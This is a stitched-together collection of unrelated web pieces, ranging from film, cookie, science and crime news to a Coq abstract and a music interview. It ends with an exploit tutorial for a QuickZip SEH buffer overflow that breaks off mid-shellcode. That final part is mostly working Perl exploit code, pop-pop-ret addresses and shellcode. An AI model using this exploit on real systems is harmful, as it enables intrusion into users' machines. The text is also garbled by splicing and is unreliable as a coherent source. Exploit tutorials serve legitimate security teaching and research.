Erwin Stoff and John Davis will produce the new version .
Ayer is the former Navy soldier who wrote Training Day and moved into directing with the dark dramas Harsh Times and Street Kings .
He will put his own real - world spin on this original premise : a retired elite special forces operative sees his daughter kidnapped and is told she ’ll die unless he gets on a plane and kills the rival of a nasty exiled dictator .
In the original , Schwarzenegger jumped off the plane before takeoff , and killed everyone involved in the kidnap plot , in a real beefcake turn that followed Terminator .
Ayer ’s protagonist will be less brawny , but more skilled in covert tactics and weaponry .
Hopefully the new version will hang onto some of the fun spirit of the original , the first of several film collaborations between Schwarzenegger and producer Joel Silver where they blew up everything in sight .
Rae Dawn
Chong played the flighty flight attendant who became the commando ’s reluctant accomplice , Dan Hedaya played the diabolical dictator , and a young Alyssa Milano played the kidnapped daughter .
It ’s the second big reboot of an Arnie action film for Fox .
The studio has a July 9 release date on Predators , a new chapter of a franchise launched by Predator , the 1987 Schwarzenegger classic .
The basic picture of the atom that many of us grew up with– that of little electrons orbiting the nucleus like so many planets orbiting the sun –turns out to be a little misleading .
Reality is somewhat more complicated : a matter of wave functions , spherical harmonics , and ultimately probability clouds .
The chart above shows the appearance of a single hydrogen atom in a few of its lowest excited states .
In each of those states , the electron is found in a different orbital , some of which have unfamiliar shapes .
But even the term “ shape ” is a little funny for something that you ca n’t hold in your hand .
These are actually probability density plots , which show the likelihood of observing the electron in any one position at a given time– and more correctly , 2D projections of 3D probability densities .
So even the humble hydrogen atom can be a bit complex .
Fortunately , we have advanced technology that can help us cut though the quantum mechanical haze : Cookies !
These are atomic spritz cookies , made by taking a fairly common cookie press and outfitting it with custom plates .
It ’s not quite a trivial process , but the end result is pretty neat : you get to eat the atomic orbitals .
While there are actually a lot of cookie presses out there , ours is an older Wilton model , which came with the extrusion plates shown above .
( All of these disks seem fairly useless , with the possible exception of the electrical ground symbol .
Standard cookie press sets should probably also include at least battery , resistor , and capacitor symbols . )
The plates are made of some rigid plastic , and are about 1.95 inches in diameter , and 1/8 ″ thick at the thickest .
Any replacement disks should be of similar size and thickness , quite rigid and strong , and made of food - safe material .
Sufficiently rigid , food - safe plastics include delrin , melamine , and glass - reinforced nylon .
We suspect that thin bamboo plywood would also work well .
A few metals , including stainless steel , would be good choices too .
We ended up locating some melamine dinner plates on sale at the local craft store .
Each had a flat section on the bottom , about 1/8 ″ thick , and we cut our extrusion plates from that material .
Melamine is a funny material .
While it ’s rigid , it carves easily .
Working with it is something like compressed wood , a bit like bone or ivory .
Drilling , sawing , and cutting with a hobby knife work very well to shape it .
If you like to whittle , you wo n’t have any trouble working with it .
If you ’re not into drilling and cutting these plates yourself , we ’d recommend getting your disks made from plastic or wood by one of the popular online laser cutting services ( like Pololu , Ponoko ) , or perhaps using online machine shops ( like emachineshop , big blue saw ) to cut it out of stainless steel by waterjet– the latter we ’d love to try next time we do this .
We drew up the shapes in Inkscape , and here are the disks that we actually ended up cutting , with various sizes and shapes of holes and slits and arcs to approximate the forms in the atomic orbitals that we ’re trying to reproduce .
Here ’s one of the disks ( n , l , m = 3 , 2 , 1 ) , mounted in the front of the cookie press , held in place by threading on the front ring .
We used the standard recipe for spritz cookies , and dutifully extruded all the different energy levels onto the cookie sheets .
The ( 4,1,0 ) cookies came out really well ; it ’s almost hard to believe that you can just extrude a complex cookie shape like that all at once .
And bake according to the datasheet recipe .
Optionally , arrange according to principal quantum number .
If you liked this project , you might like some of our other food projects , including Sierpinski cookies and circuitry snacks .
( If you ’ve got a spritz cookie press and need something else to do with it , we also recommend that you check out George Hart ’s Trilobite cookies . )
By Tom Esslemont
BBC News , Tbilisi
The Orthodox Church in Georgia has a strong following Officials in the ex-Soviet republic of Georgia have announced a scheme to let prisoners shorten their jail terms by spending time in a monastery instead .
The scheme for petty criminals has been proposed by the country 's Orthodox Church and government officials .
It comes as prisoner numbers in Georgia continue to rise and so too does the popularity of the Church .
It is unclear how many prisoners will be allowed to become monks or if they have any choice in the matter .
Overcrowding
To say that the Orthodox Church plays an important and influential role in Georgia is an understatement .
Some 80 % of its population are said to be Orthodox Christians and its leaders have at times played a part in politics .
Now the Church has gone a step further by directly offering to help reform certain criminals by handing them a cassock and allowing them to serve out their sentence as monks .
In a joint statement , officials from the prisons ministry and the Church said they would work together to select the convicts they thought would benefit most from spending time in a monastery .
They said the purpose was to liberalise the criminal justice system , but the reality is that prisoner numbers are rising fast in Georgia .
A report last year by a penal reform organisation said the incarceration rate had risen by 300 % since 2004 and that jails were badly overcrowded .
A senior cleric told the BBC he believed the Church played a positive role in society and that the scheme could work .
Bookmark with : Delicious
Digg
reddit
Facebook
StumbleUpon
What are these ?
E-mail this to a friend Printable version
Astronomy Picture of the Day Discover the cosmos !
Each day a different image or photograph of our fascinating universe is featured , along with a brief explanation written by a professional astronomer .
2010 March 27
Hesiodus Sunrise Ray
Image Credit & Copyright : Stefan Seip ( TWAN )
Explanation : Stark shadows of mountains and crater walls stand out along the lunar terminator , or shadow line between night and day , in this telescopic image .
Of course , if viewed from the lunar surface near the terminator line , the Sun would be rising and still close to the lunar horizon .
But the picture 's inset at the left highlights a more elusive lunar sunrise phenomenon .
Streaming through a gap in the eastern wall of 45 kilometer wide Hesiodus crater , the low - angle sunlight produces a long sunrise ray playing along the otherwise shadowed crater floor .
Sunrise rays are short - lived and can be rewarding to spot for Moon enthusiasts with telescopes .
Seen in Hesiodus and other craters , the ray timing can be calculated based on the observer 's location .
This picture of a first quarter Moon was recorded at 23:45 UT on February 22nd from Stuttgart , Germany .
In the inset , the larger crater Pitatus is at the right .
For location , Hesiodus and Pitatus are circled at the bottom of the picture .
It does n't look like a car , and it does n't look like it would fly , but what is believed to be the world 's oldest " roadable aircraft " is for sale .
The antique was built in 1934 by Frank Skroback and at the very minimum provides proof that people have long dreamed of cars that can be flown like airplanes .
Or are they airplanes that can be driven like cars ?
No matter , because whatever you call it , it 's being auctioned this weekend in Atlanta .
In addition to the wild machine , the winning bidder scores extensive documentation , including the 1921 patent on the design and correspondence demonstrating Skroback 's attempt to sell his vehicle .
This is n't the first flying car to hit the block .
A Taylor Aerocar was auctioned more than a year ago .
The Taylor is probably the most famous – and successful – example of an aircraft you can drive .
Or car you can fly .
Unlike the Aerocar , nobody can seem to find proof of Skroback 's vehicle ever taking flight .
It looks like little more than a fuselage with six small wings attached .
Red Baron 's Antiques , which is selling the plane , says it is 21 feet long , and each wing has a 7 - foot span .
Those wings look like they may come up a bit short in providing enough lift .
But even if the wings could lift the stubby fuselage off the ground , a lack of any substantial vertical control surfaces would likely mean controlled flight would be tricky at best .
There are some small rudder - like appendages on the rear wings , but they hardly look big enough to provide any sort of directional stability .
No word on what the engine is , but with the the obvious drag and small wings , our guess is that it had better be more powerful than it appears if this thing has any hope of even getting the tail wheel off the ground .
It 's safe to say the guys at Terrafugia have nothing to worry about , in terms of somebody putting Skroback 's contraption into production .
Photo : Red Baron's Antiques
Barnes & Noble has updated the firmware of its Nook e-reader to v1.3 .
The update tweaks existing features and adds a few brand new ones .
The most exciting is the addition of a web browser , classified as " experimental " , just like the one on the Kindle .
It uses the e-ink screen , not the touch - sensitive color one at the bottom , but it will let you choose bookmarks from the LCD , as well as using its virtual keyboard to enter urls .
There are also chess and sudoku games , which both seem perfect for a slow - updating grayscale display .
The chess game offers a computer - controlled opponent with three skill levels .
This is one of those things that seems obvious once you hear about it , and we would n't be surprised to see chess on the Kindle in the future , if its non-Android OS is up to it .
There are also a few interface and menu tweaks , but the addition B&N seems most proud of might actually be the lamest , which is why I have shifted it to the end of this post .
The Read in Store feature has been updated to let you read entire books when in an actual B &N store .
You know , just like you can do with a real paper book .
Why is this lame ?
From the blurb : " you 're free to read any parts of any available eBook for ** up to an hour ** per day ! " [ emphasis added , excited exclamation mark in original ] .
Yeah , one measly hour .
What is the point of limiting reading time when the person in the store can just go and pick up the freaking paper book ?
This , rather than being a feature is just a way to piss off Nook buyers .
Way to annoy your most loyal customers , B&N .
UPDATE : A B&N representative got in touch to clarify that this one - hour limit is per-book , which should be plenty long enough to decide if you want to buy .
Despite this , the update looks to add a lot of extra stuff , and free .
Your Nook should update itself over the next week when connected to Wi -Fi .
If you 're desperate to grab it right now , you can use the " Check for new B&N content " command the under " My Library " section , or download it to your computer from the update page .
New to NOOK : Version 1.3 Available Now !
[ Barnes & Noble ]
Support and download page [ Barnes & Noble ]
See Also :
Chicago , Illinois ( CNN ) -- A " horrendous " early - morning shooting in Chicago 's Marquette Park neighborhood left four people dead Wednesday in what police believe was a domestic dispute .
Two people are in the hospital in critical condition , and a suspect was taken into custody , according to John Kupczyk , Eight District police commander .
Kupczyk told reporters gathered at the shooting scene that police received a 911 emergency call around 4:30 a.m. CT ( 5:30 a.m. ET ) .
When responders arrived , they found four victims dead in the house on South Mozart Street .
Local coverage by CNN affiliate WGN
Two injured victims were taken to Advocate Christ Hospital , where they remain in critical condition .
Two additional witnesses were at the scene , and Kupczyk said the witnesses helped identify a suspect , who has been taken into custody for questioning .
Police also have recovered a weapon , Kupczyk said , but are still trying to determine whether it was used in the shootings .
Authorities have n't determined the relationship of all the victims , but Kupczyk described them as " family members . "
He told reporters that police do n't know the relationship between the suspect and victims .
CNN affiliate WGN - TV in Chicago reported that police are reviewing security camera footage from city buses that the suspect may have taken following the shootings .
Police did not describe how the suspect was apprehended .
Kupcyzk described the scene as " horrendous " and " incomprehensible . "
He told reporters the investigation was affecting his men , since " we officers have families , too . "
Jargon Jargon is terminology which is especially defined in relationship to a specific activity , profession , group , or event .
The philosophe Condillac observed in 1782 that " Every science requires a special language because every science has its own ideas . "
As a rationalist member of the Enlightenment he ...
Tinker A tinker was originally an itinerant tinsmith , who mended household utensils .
The term " tinker " became used in British society to refer to marginalized persons ...
Spain Spain , officially the Kingdom of Spain languages ] ] under the European Charter for Regional or Minority Languages .
In each of these , Spain 's official name is as follows : ; ; ; ; ; ; ) , is a country and member state of the European Union located in southwestern Europe on the Iberian Peninsula ...
Spain , officially the Kingdom of Spain languages ] ] under the European Charter for Regional or Minority Languages .
In each of these , Spain 's official name is as follows : ; ; ; ; ; ; ) , is a country and member state of the European Union located in southwestern Europe on the Iberian Peninsula ...
Germanía Germanía is the Spanish term for the argot used by criminals or in jails in Spain during 15th and 16th centuries .
Its purpose is to keep outsiders out of the conversation ...
Calo Calo , Caló , or Calò may refer to :* Caló language , the language of the Iberian Romani** Iberian Kale :*** Romani people in Spain , more frequently called gitanos *** Romani people in Portugal , more frequently called ciganos ...
Cant ( language ) A Cant is the jargon or argot of a group , often implying its use to exclude or mislead people outside the group .
-Derivation in Celtic linguistics :...
Spanish language Spanish , also known as Castilian , is a Romance language in the Ibero - Romance group that evolved from several languages and dialects in central - northern Iberia around the 9th century and gradually spread with the expansion of the Kingdom of Castile into central and southern Iberia during the ... Spanish , also known as Castilian , is a Romance language in the Ibero - Romance group that evolved from several languages and dialects in central - northern Iberia around the 9th century and gradually spread with the expansion of the Kingdom of Castile into central and southern Iberia during the ...
Descendants of mechanical workers who arrived in Spain from central Europe in the 16th century .
Descendants of peasants who lost their land in the 16th century ;
Descendants of intermarriage between the Roma and non-Roma populations ;
Descendants of Muslims Morisco Moriscos or Mouriscos , meaning " Moorish " , were the converted Christian inhabitants of Spain and Portugal of Muslim heritage .
Over time the term was used in a pejorative sense applied to those nominal Catholics who were suspected of secretly practicing Islam .
-Demographics :
By the beginning of the ... Moriscos or Mouriscos , meaning " Moorish " , were the converted Christian inhabitants of Spain and Portugal of Muslim heritage .
Over time the term was used in a pejorative sense applied to those nominal Catholics who were suspected of secretly practicing Islam .
-Demographics :
By the beginning of the ...
A mixture of the above .
Notable mercheros
Eleuterio Sánchez Eleuterio Sánchez Eleuterio Sánchez Rodríguez , known as El Lute , was at one time listed as Spain 's " Most Wanted " criminal .
He was a legendary Spanish outlaw who escaped several times from prison after being convicted and sentenced at age 23 to 30 years for murder ...
El Lute .
A petty thief in his early life , he was convicted of armed robbery and murder ; after escaping from prison , he was listed as " The Most Wanted " by the Spanish police .
Later he earned a law degree and wrote five books .
He was pardoned at age 39 .
The source of this article is wikipedia , the free encyclopedia .
The text of this article is licensed under the GFDL
is associated withs ) , a reduced and possibly vanishing semi-nomadic group who live mainly in the northern half of Spain .
They prefer to be called
The language is an old form of Castilian , , said to be related to Caló , a dialect of the Spanish Roma .
The term comes from the word ( ironmongery ) , from ironmongers who originated this cant as part of their trade .
Because the men were frequently blamed for petty crime , in modern Spanish the word is associated with references to delinquent , petty thief , or hoodlum .
The mercheros identify as a distinct group separate from the RomaAs many Spaniards are unaware of theas a cultural group , they simply associate the termwith marginality and low - life .
Some think the wordhad its origins in the English word kinky , used more widely in the 20th century ..
Scholars have many theories about the social origins of , summarized as the following :
Our partners at SeattleCrime are reporting that Michael McConnell , owner of the Caffe Vita and Via Tribulani chains and one of the kings of Pike / Pine has been charged with assault , DUI , and hit and run charges after he allegedly crashed into , and then attacked , another motorist near Seattle University last week :
According to a police report , a man told police he was sitting in his car waiting for the light at James St and Broadway at about 6:00 pm on March 31st when black Mercedes , apparently occupied by McConnell , crashed into him from behind .
Both drivers pulled off of the road but , the report says , but McConnell refused to give the victim his information .
The report notes the victim smelled alcohol on McConnell ’s breath .
McConnell ’s attorney — who was driving another vehicle behind McConnell — tried to intervene , the police report says , and told the victim “ they would give him $ 1,500 to pay for the vehicle damages and not call police . ”
And that ’s when it started getting even more interesting , reports SeattleCrime .
Crime reports that McConnell has entered a not guilty plea on all charges , according to court documents .
Hop over to Seattle Crime for the full report .
McConnell ’s pizza and coffee empire recently expanded to Pioneer Square where the businesses are managed by his son , Chris .
The elder McConnell is also behind the new pizza restaurant taking shape next to E. Pike ’s Caffe Vita location .
Expanding its caffeine - laden offerings , Vita was recently approved for a license to serve beer and wine .
Okay , a politician like Harry Reid is a polarizing figure .
He makes some people very angry .
Fine .
But when anyone — be it Harry Reid or one of his critics across the aisle — faces a random , personal tragedy , the American public can expect media commentators to remove their ideological boxing gloves and give that person a break .
Right ?
Well , apparently not .
Two days after Reid ’s wife Landra was sent to the hospital with a broken neck and broken back after a car accident in which their daughter was also hurt , conservative blogger Dan Riehl took the golden opportunity of Reid ’s grief to say something so morally abhorrent and politically reprehensible .
ADVERTISEMENT
So , in Riehl ’s own words :
If Democrats want so badly to abort babies because of ( healthcare costs ) , why are we bothering with someone who has a broken neck and back at 69 ?
It sounds to me like she ’s pretty well used up and has probably been living off the taxpayers for plenty of years to begin with .
Are n’t we at least going to get a vote on it ?
It ’s possible that Riehl is trying to allude to the non-existent “ death panels ” made infamous by Sarah Palin .
But if Riehl is attempting irony , it falls seriously flat .
Writers across the Web have quickly denounced his statement that Reid “ pull the plug ” on his wife .
Come on , Harry – do your civic duty .
The nation ’s broke and counting on you guy .
Pull the plug and get back to work .
And do n’t bill us for a full day today , either .
This is no time to be sloughing off .
Air freight her home , you can bury her during recess on your own time and dime .
Or are you going to bill us for that , too ?
Media Matters quickly linked to the blog and eviscerated Riehl for his statement .
Riehl immediately responded with this little gem :
Well , that did n’t take long for Media Mutters to link .
I wish I knew those babies way back when .
I ’d have taken a coat hanger to them !
ADVERTISEMENT
As pointed out by a political blog , it would be great if the mainstream media condemned Riehl and stonewalled him from ever participating in political commentary .
Maybe that will be the same day the national conversation returns to mutual respect and human decency .
Until then , Riehl ’s blog will likely stay in business .
Cours
Abstract :
These notes provide a quick introduction to the Coq system and show how it can be used to define logical concepts and functions and reason about them .
It is designed as a tutorial , so that readers can quickly start their own experiments , learning only a few of the capabilities of the system .
A much more comprehensive study is provided in [ 1 ] , which also provides an extensive collection of exercises to train on .
Seven years ago , while at the top of her game , Jennifer Knapp announced what seemed to many a sudden decision :
She was stepping away from Christian music , taking an indefinite hiatus .
Rumors began to swirl — she was burned out , she needed a rest , she was upset about something , she was gay .
Turns out that all the rumors were true , as Knapp reveals in this rambling , exclusive interview with Christianity Today .
The one - time Grammy nominee ended her hiatus in late 2009 with a few small shows , an updated website , and an announcement that she was writing new songs .
Many of those songs will be featured on Letting Go , releasing May 11 , her first album since 2001's The Way I Am .
In one of her first extensive interviews since announcing her comeback , Knapp , 36 , talks to CT about why she quit music in the first place , her lifestyle choice , her rekindled passion for songwriting , her faith , her new album , and more .
You announced your " hiatus " in 2003 .
Was that a sudden decision , or was it boiling for a while ?
Jennifer Knapp :
It was boiling for me .
I think people thought I just fell into a hole and disappeared , but I had been trying to get out of being on the road 250 days a year .
Lay
It Down was a 2000 release , and The Way I Am was 2001 ; those records were literally back to back , and I was touring while recording The Way I Am .
I was telling people " Man , I can't keep up the schedule .
This is just a little bit crazy . "
I did n't have any space to just be a normal human being .
I finally realized nobody was going to make that decision for me , so I just said , " I 'm not kidding .
I need a break , and it starts now . "
That decision came mid-2001 , but my schedule did n't allow me to stop until September 2002 , when I did my last show ; I basically still ...
1
I have to admit this was n’t he style of music that I was expecting from Game ’s first single release from his upcoming release The Red Album .
I was expecting him to have a much harder beat , but this joint which is produced by Pharrell & JT is very laid back .
The increasing amount of Timberlake cameos appearing recently suggests to me that we might be seeing a studio album from him later this year which would be exciting .
No release date is set yet for the release of this single , so just enjoy it .
Game – Ain’t No Doubt About
It feat .
Pharrell & Justin Timberlake
Audio clip : Adobe Flash Player ( version 9 or above ) is required to play this audio clip .
Download the latest version here .
You also need to have JavaScript enabled in your browser .
Today ( as promised in part 1 of the QuickZip Stack BOF exploit write - up ) , I will explain how to build the exploit for the quickzip vulnerability using a pop pop ret pointer from an OS dll .
At the end of part 1 , I challenged you , the Offensive Security Blog reader , to try to build this exploit ( using a ppr pointer from an OS dll ) yourself ( try hard ) and to contact me if you were able to complete the exercise .
Deadline has passed , so I will now go ahead and document the steps I took to build this version of the exploit .
Before we start , there ’s some good and some bad news .
The good news is that this post will be somewhat shorter than the first one .
The bad news is that you really need to read and understand the first part of the article before reading this one .
If you do n’t , you will have a hard time understanding this post .
Summarizing part 1 , we have discovered the following things :
Quickzip suffers from a stack based buffer overflow , allowing us to overwrite a SEH record ( after 297 bytes on my Virtual Box XP.
offset may be different on your system )
we can use a pointer to pop pop ret from the executable itself ( quickzip.exe ) to gain control over the execution flow of the application .
we have to deal with a character set limitation that forced us to be a little creative
we could find our payload on the heap , unmodified
we had to use an egg hunter to locate our payload on the heap , and jump to it
we used a custom decoder to align registers and jump to the egg hunter .
In this article , I will explain the steps to build an exploit for the same vulnerability , but this time I will be using a pointer from a dll delivered with the Windows operating system .
I am using Windows XP SP3 English ( Professional ) , so the addresses I will be using may be different on your system .
I realize and admit that this approach ( using a pointer from an OS dll ) is less reliable in terms of making the exploit work across various versions of the Windows OS .
On the other hand I believe it still is a good exercise .
Have fun with it .
What can we expect ?
Based on the research we did in the first part of the article , this is what one could expect when trying to build a typical SEH based exploit with a ppr pointer from an OS dll . :
When using a ppr pointer from an OS dll , we probably do n’t have to deal with a null byte
As a result of that , we should be able to control the payload that sits in the buffer after overwriting the SEH record ( so we would not have to use an egg hunter )
When those 2 conditions are met , the 4 byte code a nseh would allow us to jump forward and land at the payload after the SEH record ( = location to host shellcode )
The shellcode ( which can be placed after the SEH record ) most likely needs to be encoded , so we may have to do some “ magic ” to get it to run
The payload structure will look something like this
[ junk ] +[ nseh ( jump forward ) ] +[ seh ] +[ magic ] +[ encoded payload ]
Let ’s find out how far we get with this .
First chocolates first : ppr + jump forward
As shown in part 1 , the pop pop ret address we need to look for , must be charset compatible .
All we need to do to get a list of all available pop pop ret pointers , from non safeseh compiled modules , is run ! pvefindaddr p from within Immunity Debugger , while it is attached to the QuickZip application .
The output is written to ppr.txt , so we can easily find a working pointer in this file .
One of the addresses that meets our requirements is 0x6D7E4331 ( from d3dxof.dll ) .
This address will survive the character set conversion , and is part of a non Safeseh protected module .
Note : starting from v1.22 of the pvefindaddr plugin , the output files generated by the plugin will contain markers , indicating if a given address is only made up of ascii-printable bytes , and whether these bytes are nums&chars only or not .
This will help you locating workable addresses in a faster way .
Next , we will probably want to use the 4 bytes at nseh to make jump forward , effectively jumping over the address in SE Handler , landing at the payload that is put in the buffer right after overwriting the SEH record .
There are 2 approaches to do this .
We already know that we cannot use the 0xeb opcode to jump forward .
But we also learned that we should be able to use a conditional jump .
A second option would be to use opcode at nseh that would acts as a nop slide , and to use a ppr pointer at SE Handler that would , when the bytes it consists of are executed as instructions , would act as a nop as well .
So instead of jumping over the address at SE Handler , we might be able to find a way to just walk across it .
This technique is commonly used in SEH based unicode buffer exploits .
Option 1 : Conditional jump
Based on the state of the flags when the access violation occurs ( the SEH record is overwritten and the pop pop ret is executed ) we may be able to use for instance opcode 0x73 or 0x74 to make a jump forward .
These instructions require a one byte offset , so that ’s ok .
( We have 4 bytes at our disposal ) .
One of the smallest character - set compatible offsets we can use is 21 .
So if we put 0x74 0x21 0x41 0x41 ( where 0x41 just act as fillers here ) , our code would look something like this .
my $ filename= " corelan2.zip " ; my $ ldf_header = " x50x4Bx03x04x14x00x00 " .
" x00x00x00xB7xACxCEx34x00x00x00 " .
" x00x00x00x00x00x00x00x00 " . " xe4x0 f " . " x00x00x00 " ; my $ cdf_header = " x50x4Bx01x02x14x00x14 " .
" x00x00x00x00x00xB7xACxCEx34x00x00x00 " .
" x00x00x00x00x00x00x00x00x00 " .
" xe4x0 f " .
" x00x00x00x00x00x00x01x00 " .
" x24x00x00x00x00x00x00x00 " ; my $ eofcdf_header = " x50x4Bx05x06x00x00x00 " .
" x00x01x00x01x00 " .
" x12x10x00x00 " .
" x02x10x00x00 " . " x00x00 " ; my $ nseh= " x74x21x41x41 " ; #conditional jump forward my $ seh = " x31x43x7ex6d " ; # pop pop ret from d3dxof.dll my $ payload = " A " x 297 .
$ nseh .
$ seh ; my $ rest = " B " x ( 4064 - length ( $ payload ) ) . " .txt " ; $ payload = $ payload .
$rest ; print " Payload size : " . length ( $ payload ) . " n " ; print " [+]
Removing $ filenamen " ; system ( " del $ filename " ) ; print " [+]
Creating new $ filenamen " ; open ( FILE , " > $ filename " ) ; print FILE $ ldf_header.$payload.$cdf_header.$payload.$eofcdf_header ; close ( FILE ) ;
Execute the script , and open the newly created zip file in QuickZip .
Trigger the overflow and look at the current CPU view right after pop pop ret got executed :
We land at 0x0012FBFC ( nseh ) , which contains our conditional jump , followed by 41 41 )
This conditional jump will indeed allow us to jump forward and land in the B’s that were located in the buffer right after what was used to overwrite SEH with .
This approach works , but we made a jump over a substantial number of bytes here .
Size is not really an issue in this particular exploit , but if it would have been , then perhaps the next option may be a better solution .
Option 2 : “ Walkover ”
There is a second way to get code execution from nseh , getting past the 4 bytes ( pointer address ) at SEH .
Instead of making a jump , we can try a walkover .
Start by placing 4 bytes at nseh that would act as a nop ( for example 0x41 0x41 0x41 0x41 ) .
These 4 bytes would translate into 4 INC ECX instructions , which is pretty harmless at that point in the exploit process .
As a result , they would successfully act as NOP .
Next , the ppr pointer , the 4 bytes at SEH , must act as NOP too – or at least should not break execution flow .
Look back at the screenshot above .
The 4 bytes at SEH ( 0x6D7E4331 ) , when they would be executed as if they were instructions instead of a pointer to pop pop ret , transpire into the following instructions :
0012FC00 3143 7E XOR DWORD PTR DS :[ EBX+7E ] , EAX 0012FC03 6D INS DWORD PTR ES :[ EDI ] , DX
Obviously , based on the current values in the registers EAX and EBX , the first instruction will cause an access violation :
EAX 00000000 ECX 6D7E4335 D3DXOF .6D7E4335 EDX 7C9032BC ntdll.7C9032BC EBX 00000000 ESP 0012F5C0 EBP 0012F68C ESI 7C9032A8 ntdll.7C9032A8 EDI 00000000 EIP 0012FC00
Both registers ( eax and ebx ) are set to zero , so we would be trying to write into address at 0000007E , which is not a valid address .
We could try to write some code ( 4 bytes at nseh ) to fix this …
( What if we use those 4 bytes to put something useful in eax and ebx ?
It might be possible , ( by popping addresses from the stack for example ) , but let ’s not waste our time on that if there is a better solution . )
In this case , the better solution is : find another ppr pointer .
Look back at ppr.txt .
There are plenty of addresses that wo n’t cause an access violation .
Take for example 0x6D7E4765 .
When translated into instructions , this would result in
0012FC00 65:47 INC EDI 0012FC02 7E 6D JLE SHORT 0012FC71
The first instruction ( INC EDI ) will obviously not cause any issues .
The second instruction ( conditional jump ) will not cause an issue either , because the condition to make the jump is not met when the code executes .
The zero flag is 0 , so the jump is not taken .
Result : the bytes at nseh and SEH would act as some kind of nop , allowing us to walk over the SEH record .
my $ filename= " corelan2.zip " ; my $ ldf_header = " x50x4Bx03x04x14x00x00 " .
" x00x00x00xB7xACxCEx34x00x00x00 " .
" x00x00x00x00x00x00x00x00 " . " xe4x0 f " . " x00x00x00 " ; my $ cdf_header = " x50x4Bx01x02x14x00x14 " .
" x00x00x00x00x00xB7xACxCEx34x00x00x00 " .
" x00x00x00x00x00x00x00x00x00 " .
" xe4x0 f " .
" x00x00x00x00x00x00x01x00 " .
" x24x00x00x00x00x00x00x00 " ; my $ eofcdf_header = " x50x4Bx05x06x00x00x00 " .
" x00x01x00x01x00 " .
" x12x10x00x00 " .
" x02x10x00x00 " . " x00x00 " ; my $ nseh= " x41x41x41x41 " ; #INC ECX = NOP my $ seh = " x65x47x7ex6d " ; # pop pop ret from d3dxof.dll = NOP my $ payload = " A " x 297 .
$ nseh .
$ seh ; my $ rest = " B " x ( 4064 - length ( $ payload ) ) . " .txt " ; $ payload = $ payload .
$rest ; print " Payload size : " . length ( $ payload ) . " n " ; print " [+]
Removing $ filenamen " ; system ( " del $ filename " ) ; print " [+]
Creating new $ filenamen " ; open ( FILE , " > $ filename " ) ; print FILE $ ldf_header.$payload.$cdf_header.$payload.$eofcdf_header ; close ( FILE ) ;
So , after pop pop ret is executed , the 4 bytes at nseh will just perform INC ECX , and then the 4 bytes at SE will get executed and act as a slide .
nseh :
Step through until 0012FC04 ( which is the first “ B ” placed in the buffer after overwriting the SEH record )
That worked fine , we ended right after SEH and we did n’t spoil any bytes .
The chocolate shellcode
Ok , at this point we know that we have space for shellcode and that we can get code to execute .
In this article , I will use the second “ walkover ” option , because the “ ganache ” tastes much better .
In part 1 , we discovered that our buffer is subject to character set limitation .
We had to alpha encode our egg hunter to make it work .
The shellcode itself , however , was not impacted a lot , but it was placed on the heap ( hence the need for the egg hunter ) .
In the current exercise , there is plenty of room for shellcode , in a controlled location , on the stack .
We only have to encode the shellcode , and get it to execute .
Creating the shellcode
We will use some basic MessageBox shellcode again :
root@krypt2:/pentest/exploits/framework3 # ./msfpayload windows/messagebox TITLE=" CORELAN " TEXT=" corelanc0d3r says hi again to all Offensive Security Blog visitors " P # windows / messagebox - 328 bytes # http://www.metasploit.com
# EXITFUNC=process , TEXT=corelanc0d3r says hi again to all # Offensive Security Blog visitors , TITLE=CORELAN my $ buf = " xd9xebx9bxd9x74x24xf4x31xd2xb2x7ax31xc9x64 " .
" x8bx71x30x8bx76x0cx8bx76x1cx8bx46x08x8bx7e " .
" x20x8bx36x38x4fx18x75xf3x59x01xd1xffxe1x60 " .
" x8bx6cx24x24x8bx45x3cx8bx54x05x78x01xeax8b " .
" x4ax18x8bx5ax20x01xebxe3x37x49x8bx34x8bx01 " .
" xeex31xffx31xc0xfcxacx84xc0x74x0axc1xcfx0d " .
" x01xc7xe9xf1xffxffxffx3bx7cx24x28x75xdex8b " .
" x5ax24x01xebx66x8bx0cx4bx8bx5ax1cx01xebx8b " .
" x04x8bx01xe8x89x44x24x1cx61xc3xb2x08x29xd4 " .
" x89xe5x89xc2x68x8ex4ex0execx52xe8x9cxffxff " .
" xffx89x45x04xbbx7exd8xe2x73x87x1cx24x52xe8 " .
" x8bxffxffxffx89x45x08x68x6cx6cx20xffx68x33 " .
" x32x2ex64x68x75x73x65x72x88x5cx24x0ax89xe6 " .
" x56xffx55x04x89xc2x50xbbxa8xa2x4dxbcx87x1c " .
" x24x52xe8x5exffxffxffx68x4cx41x4ex58x68x43 " .
" x4fx52x45x31xdbx88x5cx24x07x89xe3x68x72x73 " .
" x58x20x68x73x69x74x6fx68x67x20x76x69x68x20 " .
" x42x6cx6fx68x72x69x74x79x68x53x65x63x75x68 " .
" x69x76x65x20x68x66x65x6ex73x68x6cx20x4fx66 " .
" x68x6fx20x61x6cx68x69x6ex20x74x68x20x61x67 " .
" x61x68x73x20x68x69x68x20x73x61x79x68x30x64 " .
" x33x72x68x6cx61x6ex63x68x63x6fx72x65x31xc9 " .
" x88x4cx24x42x89xe1x31xd2x52x53x51x52xffxd0 " .
" x31xc0x50xffx55x08 " ;
Encoding the shellcode
Encoding this shellcode is easy .
Write the perl shellcode bytes to a file ( see writecode.pl script below ) , and we also need to take a decision about the basereg to use .
We remember from part 1 that we needed to write a custom decoder to make this basereg point exactly to the first byte of the encoded shellcode to make it work .
And that custom decoder uses eax as register to craft our bytecode values .
Using eax as basereg is not a good choice … so we will use ebx as basereg .
root@krypt2:/pentest/exploits/alpha2 # cat writecode.pl #!/usr/bin/perl # Little script to write shellcode to file # Written by Peter Van Eeckhoutte # http://www.corelan.be:8800 my $ code = " xd9xebx9bxd9x74x24xf4x31xd2xb2x7ax31xc9x64 " .
" x8bx71x30x8bx76x0cx8bx76x1cx8bx46x08x8bx7e " .
" x20x8bx36x38x4fx18x75xf3x59x01xd1xffxe1x60 " .
" x8bx6cx24x24x8bx45x3cx8bx54x05x78x01xeax8b " .
" x4ax18x8bx5ax20x01xebxe3x37x49x8bx34x8bx01 " .
" xeex31xffx31xc0xfcxacx84xc0x74x0axc1xcfx0d " .
" x01xc7xe9xf1xffxffxffx3bx7cx24x28x75xdex8b " .
" x5ax24x01xebx66x8bx0cx4bx8bx5ax1cx01xebx8b " .
" x04x8bx01xe8x89x44x24x1cx61xc3xb2x08x29xd4 " .
" x89xe5x89xc2x68x8ex4ex0execx52xe8x9cxffxff " .
" xffx89x45x04xbbx7exd8xe2x73x87x1cx24x52xe8 " .
" x8bxffxffxffx89x45x08x68x6cx6cx20xffx68x33 " .
